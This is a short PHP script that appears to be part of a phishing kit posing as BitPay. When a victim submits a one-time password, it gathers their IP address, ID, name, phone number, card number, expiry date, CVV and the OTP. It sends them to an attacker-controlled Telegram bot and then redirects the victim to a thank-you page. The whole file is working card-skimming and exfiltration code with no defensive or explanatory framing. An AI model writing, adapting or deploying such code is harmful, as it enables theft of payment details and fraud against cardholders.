<?php

session_start();
include 'config.php';

$date = date('m/d/Y h:i:s a', time());
$ip = getenv("REMOTE_ADDR");
if($_POST['otp'] != "" )
{	
$message .= "🔪🔪💣💣nAoxide-BITPAY💣💣🔪🔪\n";
$message .= " 🌏  IP   : ".$_SESSION['ip']."\n";
$message .= " 🆔 ID : ".$_SESSION['id']."\n";
$message .= " 🧑 Name : ".$_SESSION['name']."\n";
$message .= " 📞 Phone Number : ".$_SESSION['mobile']."\n";
$message .= " 💳 Card : ".$_SESSION['card']."\n";
$message .= " 📆 Expiry : ".$_SESSION['month']."/".$_SESSION['year']."\n";
$message .= " 🔑 CVV : ".$_SESSION['cvv']."\n";
$message .= " 📟 OTP : ".$_POST['otp']."\n";
$message .= "🔪🔪💣💣##############💣💣🔪🔪";


//======= bot telgram message ======== //
file_get_contents("https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$chatID."&text=" . urlencode($message)."" );
header("Location: thankyou.html");
} else{
header("Location: otp.html");}

?>